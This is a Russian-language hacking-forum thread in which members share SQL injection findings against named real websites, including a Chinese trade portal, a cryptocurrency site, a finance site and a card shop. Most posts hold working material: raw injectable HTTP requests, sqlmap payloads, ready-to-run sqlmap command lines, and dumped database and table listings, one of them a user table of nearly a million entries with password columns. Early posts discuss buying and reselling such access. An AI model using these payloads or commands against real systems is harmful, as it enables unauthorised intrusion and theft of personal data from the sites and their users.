Найденные интересеные SQL inj & XSS

rooting_kong

floppy-диск
Забанен
Регистрация
11.04.2020
Сообщения
8
Реакции
1
Баллы
3
Пожалуйста, обратите внимание, что пользователь заблокирован
Я такого мусора 1к линков могу выложить...за Китай хотя бы платят
 

Xrenovi4

Скидди
Premium
Регистрация
02.10.2018
Сообщения
347
Реакции
610
Баллы
108
Telegram
Jabber
Я такого мусора 1к линков могу выложить...за Китай хотя бы платят
От тебя еще ничего полезного на форум не было выложено, языками чесать все могут.
А тем более ты просишь что бы люди тебе бесплатно скидывали материал, что бы ты продавал...
 

rooting_kong

floppy-диск
Забанен
Регистрация
11.04.2020
Сообщения
8
Реакции
1
Баллы
3
Пожалуйста, обратите внимание, что пользователь заблокирован
Подразумевается что будем выкупать. Полезность понятие относительное. Выложу инЬекций как до компа доберусь
 

_txt_

HDD-drive
Пользователь
Регистрация
26.04.2020
Сообщения
21
Реакции
163
Баллы
34

rooting_kong

floppy-диск
Забанен
Регистрация
11.04.2020
Сообщения
8
Реакции
1
Баллы
3
Пожалуйста, обратите внимание, что пользователь заблокирован
Хард с базами в другом городе, придется подождать
 

USEbhf

RAM
Пользователь
Регистрация
16.01.2020
Сообщения
115
Реакции
91
Баллы
24

Xrenovi4

Скидди
Premium
Регистрация
02.10.2018
Сообщения
347
Реакции
610
Баллы
108
Telegram
Jabber
POST /msg/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=vfas2epei0a10pedfdcldjrn62;WeiLong=qg2p80gb5fn80bpk52nj0n2k63;bshare_off=true
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 378
Host: www.vlongbiz.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

Submit=%B5%C7%C2%BC&u_password=pwd&u_user=1*

Код:
Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

    Payload: Submit=%B5%C7%C2%BC&u_password=g00dPa$$w0rD&u_user=' AND 1747=(SELECT (CASE WHEN (1747=1747) THEN 1747 ELSE (SELECT 4815 UNION SELECT 8580) END))-- -


    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: Submit=%B5%C7%C2%BC&u_password=g00dPa$$w0rD&u_user=' AND (SELECT 9688 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(9688=9688,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RRFl

---

back-end DBMS: MySQL >= 5.0

available databases [4]:

[*] bbs

[*] information_schema

[*] mysql

[*] vlongbiz


Database: vlongbiz

[121 tables]

+----------------------------+

| nouser                     |

| vcompany                   |

| vdemand                    |

| vproduct                   |

| vpurvey                    |

| wl_affiche                 |

| wl_agent_company           |

| wl_agent_personal          |

| wl_appraise                |

| wl_area_list               |

| wl_baduser                 |

| wl_batch_apply_dateline    |

| wl_bizclub                 |

| wl_cache_state             |

| wl_clients                 |

| wl_comment                 |

| wl_commerce                |

| wl_commerce_2008           |

| wl_commerce_20090701       |

| wl_commerce_20090930       |

| wl_commerce_20100401       |

| wl_commerce_20100830       |

| wl_commerce_20111231       |

| wl_commerce_20120501       |

| wl_commerce_20120801       |

| wl_commerce_bak            |

| wl_commerce_count_demand   |

| wl_commerce_count_purvey   |

| wl_commerce_demand_new     |

| wl_commerce_demand_new_bak |

| wl_commerce_index          |

| wl_commerce_main           |

| wl_commerce_purvey_new     |

| wl_commerce_purvey_new_bak |

| wl_commerce_recommend      |

| wl_commerce_special        |

| wl_commerce_to_sort_demand |

| wl_commerce_to_sort_purvey |

| wl_commerce_to_user_demand |

| wl_commerce_to_user_purvey |

| wl_company                 |

| wl_company_article         |

| wl_company_copy1           |

| wl_company_count           |

| wl_company_honor           |

| wl_company_index           |

| wl_company_notability      |

| wl_company_recommend       |

| wl_company_template        |

| wl_company_template_sort   |

| wl_company_to_sort         |

| wl_company_to_ware_sort    |

| wl_company_ware_sort       |

| wl_company_ware_sort_index |

| wl_count_bak               |

| wl_countdetail             |

| wl_counter                 |

| wl_counter_to_userinfo     |

| wl_datastore               |

| wl_friendlink              |

| wl_friendlink_sort         |

| wl_friendlink_to_sort      |

| wl_group                   |

| wl_group_to_popedom        |

| wl_group_to_user           |

| wl_guestbook               |

| wl_help                    |

| wl_help_to_sort            |

| wl_hot_word                |

| wl_industry                |

| wl_industry_count          |

| wl_industry_index          |

| wl_industry_index_1        |

| wl_industry_index_copy     |

| wl_info_article_index      |

| wl_info_article_sort       |

| wl_info_article_time       |

| wl_job                     |

| wl_keyword                 |

| wl_keyword_to_sort         |

| wl_license                 |

| wl_log                     |

| wl_mailtemplate            |

| wl_member_affiche          |

| wl_message                 |

| wl_message_blacklist       |

| wl_msg_link                |

| wl_msg_popedom             |

| wl_msg_user                |

| wl_msgbook                 |

| wl_news_article            |

| wl_news_article_sort       |

| wl_news_article_to_sort    |

| wl_online_message          |

| wl_online_topic            |

| wl_online_user             |

| wl_online_user_to_topic    |

| wl_popedom                 |

| wl_position                |

| wl_recruitment             |

| wl_recruitment_to_user     |

| wl_search_key              |

| wl_searcher_order          |

| wl_service                 |

| wl_service_oa              |

| wl_service_order           |

| wl_service_to_user         |

| wl_sessions                |

| wl_usergroup               |

| wl_userinfo                |

| wl_userinfo_copy           |

| wl_userinfo_copy1          |

| wl_ware                    |

| wl_ware_count              |

| wl_ware_count_copy         |

| wl_ware_detail             |

| wl_ware_index              |

| wl_ware_new                |

| wl_ware_recommend          |

| wl_ware_to_company         |

| wl_ware_to_sort            |

+----------------------------+

Database: vlongbiz
Table: wl_userinfo
[39 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| domain        | varchar(255)          |
| c_id          | varchar(32)           |
| icp           | varchar(50)           |
| old_c_free_id | int(10) unsigned      |
| old_c_id      | int(10) unsigned      |
| old_id        | int(10) unsigned      |
| u_accounts    | varchar(16)           |
| u_active      | varchar(1)            |
| u_answer      | varchar(255)          |
| u_areafax     | varchar(8)            |
| u_areaphone   | varchar(8)            |
| u_bbsusername | varchar(50)           |
| u_buyword     | varchar(32)           |
| u_corpaddress | varchar(255)          |
| u_corparea    | mediumint(9)          |
| u_corpname    | varchar(96)           |
| u_department  | varchar(32)           |
| u_email       | varchar(128)          |
| u_fax         | varchar(16)           |
| u_group       | tinyint(3) unsigned   |
| u_id          | char(32)              |
| u_logindate   | datetime              |
| u_loginip     | varchar(16)           |
| u_loginnum    | mediumint(8) unsigned |
| u_mobphone    | varchar(16)           |
| u_name        | varchar(32)           |
| u_password    | varchar(16)           |
| u_phone       | varchar(16)           |
| u_position    | varchar(64)           |
| u_postcode    | varchar(8)            |
| u_proposer    | varchar(16)           |
| u_question    | varchar(255)          |
| u_regdate     | datetime              |
| u_regip       | varchar(16)           |
| u_saleword    | varchar(32)           |
| u_sex         | enum('m','f')         |
| u_sign        | enum('1','0')         |
| u_template    | varchar(10)           |
| u_trade       | varchar(32)           |
+---------------+-----------------------+

Database: vlongbiz
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| wl_userinfo | 947595  |
+-------------+---------+
 

NisShkan

HDD-drive
Пользователь
Регистрация
08.10.2019
Сообщения
23
Реакции
5
Баллы
4
У меня такой вопрос, вы сами payload'ы перебираете? Если к примеру большую часть - нет. То покажите, что сами перебрали. Просто интересно=)
И еще маленькая просьба, ставить основную ссылку ну полную со всеми .php?id=411 и т.п на первую строчку. А потом сам пойлоад под спойлер. Дабы не видеть своего рода ответ и самому перебрать:smile10:
 

USEbhf

RAM
Пользователь
Регистрация
16.01.2020
Сообщения
115
Реакции
91
Баллы
24
Немного крипты, так сказать разбавить будни) Метод слип!
(Для особо ленивых) sqlmap -u "https://www.cryptobooost.com/login.php" --data="id=4664&password=" -p id --random-agent --risk 3 --dbs

Если не получаеться пихаем по этому пути /root/.sqlmap/output/ вот эту папку https://anonfile.com/p6FeGe0cod/www.cryptobooost.com_zip и запускаем мапу с командой которую пысал выше
*Это путь в кали /root/.sqlmap/output/ как там на ваших "виндовсах" без понятия)
Parameter: id (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-3417' OR 5762=5762-- hrtW&password=g00dPa574764w0rD

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=-1' AND (SELECT 8478 FROM (SELECT(SLEEP(5)))JKOG)-- ChcU&password=g00dPa574764w0rD
---
web application technology: Apache, PHP, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] cryptobo_2booosta
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
web application technology: Apache, PHP, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: cryptobo_2booosta
[57 tables]
+-------------------+
| transaction |
| adminsettings |
| badminsettings |
| banners |
| cause |
| cause_logs |
| cause_setting |
| cause_transaction |
| coin_logs |
| coinpayment |
| coinsettings |
| matrix1 |
| matrix10 |
| matrix11 |
| matrix12 |
| matrix13 |
| matrix14 |
| matrix15 |
| matrix16 |
| matrix17 |
| matrix18 |
| matrix19 |
| matrix2 |
| matrix20 |
| matrix21 |
| matrix22 |
| matrix23 |
| matrix24 |
| matrix25 |
| matrix26 |
| matrix27 |
| matrix28 |
| matrix29 |
| matrix3 |
| matrix30 |
| matrix4 |
| matrix5 |
| matrix6 |
| matrix7 |
| matrix8 |
| matrix9 |
| membersbanners |
| membershiplevels |
| memberstextads |
| memberwallet |
| pages |
| piflogs |
| sbadminsettings |
| smembersbanners |
| soloads |
| tadminsettings |
| testimonials |
| tlogs |
| topref |
| transactionf |
| users |
| wtransaction |
+-------------------+
 
Последнее редактирование:

Xrenovi4

Скидди
Premium
Регистрация
02.10.2018
Сообщения
347
Реакции
610
Баллы
108
Telegram
Jabber

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: http://finance.now.com:80/warrant/?range=-9546 OR 6944=(SELECT (CAS
E WHEN (6944=6944) THEN 6944 ELSE (SELECT 3342 UNION SELECT 3343) END))-- CujT&t
ype=C

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://finance.now.com:80/warrant/?range=(CASE WHEN (5419=5419) THE
N SLEEP(5) ELSE 5419 END)&type=C
---
[04:31:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12


available databases [3]:
[*] information_schema
[*] pccw_finance
[*] test
 

Chloea

CD-диск
Пользователь
Регистрация
07.01.2020
Сообщения
10
Реакции
5
Баллы
9
Кто-нибудь видел бы подвиг на сайте bureau-vallee.fr. Они только что объявили о взломе. "Мы хотели написать вам о недавнем инциденте в сфере кибербезопасности в Бюро Долины". Нынешний кризис в области здравоохранения стал свидетелем взрыва кибер-атак. К сожалению, у нас нет иммунитета".
 

Xrenovi4

Скидди
Premium
Регистрация
02.10.2018
Сообщения
347
Реакции
610
Баллы
108
Telegram
Jabber
Код:
---

Parameter: password (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 time-based blind - Parameter replace

    Payload: password='XOR (CASE WHEN (8803=8803) THEN SLEEP(5) ELSE 8803 END)XOR'Z

    Vector: (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)

---

back-end DBMS: MySQL >= 5.0.12

Команда для sqlmap
-u https://shop.cc-shop.su/login/auth --method POST --data=password=e -p password --prefix='XOR --suffix=XOR'Z --risk=3 --level=5
 

Joynses

(L3) cache
Пользователь
Регистрация
19.10.2019
Сообщения
205
Реакции
660
Депозит
0
Баллы
103
Код:
---

Parameter: password (POST)

    Type: time-based blind

    Title: MySQL >= 5.0.12 time-based blind - Parameter replace

    Payload: password='XOR (CASE WHEN (8803=8803) THEN SLEEP(5) ELSE 8803 END)XOR'Z

    Vector: (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)

---

back-end DBMS: MySQL >= 5.0.12

Команда для sqlmap
-u https://shop.cc-shop.su/login/auth --method POST --data=password=e -p password --prefix='XOR --suffix=XOR'Z --risk=3 --level=5
Для просмотра содержимого вам необходимо войти.
 

sizzeR

CD-диск
Пользователь
Регистрация
31.10.2018
Сообщения
14
Реакции
0
Баллы
8
О, неплохая тема))
 

Oblivion0o

HDD-drive
Пользователь
Регистрация
21.04.2020
Сообщения
46
Реакции
17
Баллы
12
XSS
Для просмотра содержимого вам необходимо войти.
 
Последнее редактирование:

Duble

floppy-диск
Пользователь
Регистрация
23.04.2020
Сообщения
6
Реакции
0
Баллы
1
Какие то читы
Код:
--url "https://novapays.ru/article.php?id=1" --dbs --threads 10 --batch --dbms=mysql --level 3 --risk 3
Доставка еды
Код:
--url "https://fasteda.ru/search" --data="terms=*" --dbs --thread 10 dbms=mysql --level 3 --risk 3 --batch
 

nexxxt

CD-диск
Пользователь
Регистрация
26.05.2020
Сообщения
11
Реакции
9
Баллы
3
Код:
POST /us/ajax/studio_search.ajax HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.videosz.com/
Cookie: se_id=0ca64b78b3a98c1c37149f0678b4bece;se_browser_type=desktop;se_site_id=1;se_visitor_session=1;se_link_id=1;se_first_visit=2020-06-27%2B08%253A53%253A24;se_url=http%253A%252F%252Fwww.videosz.com%252Fde%252Fajax%252Fcontact.ajax;se_pages_count=4169;se_referer=https%253A%252F%252Fwww.videosz.com%252Fde%252Fkontact;jwplayer.volume=NaN;jwplayer.qualityLabel=360p SD;jwplayer.mute=false;__cfduid=d8f08ebe8ab535df7f779182d978123221593266286
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 201
Host: www.videosz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive

cache=scenes%7C%7C1%7C0%7C0&ids=5%7C168%7C67%7C1%7C157%7C48%7C78%7C94%7C174%7C89%7C265%7C136%7C272%7C199%7C202%7C84%7C204%7C40%7C42%7C72%7C3'%20AND%203*2*1=6%20AND%20'000T1ux'='000T1ux&mode=get_related
 
Верх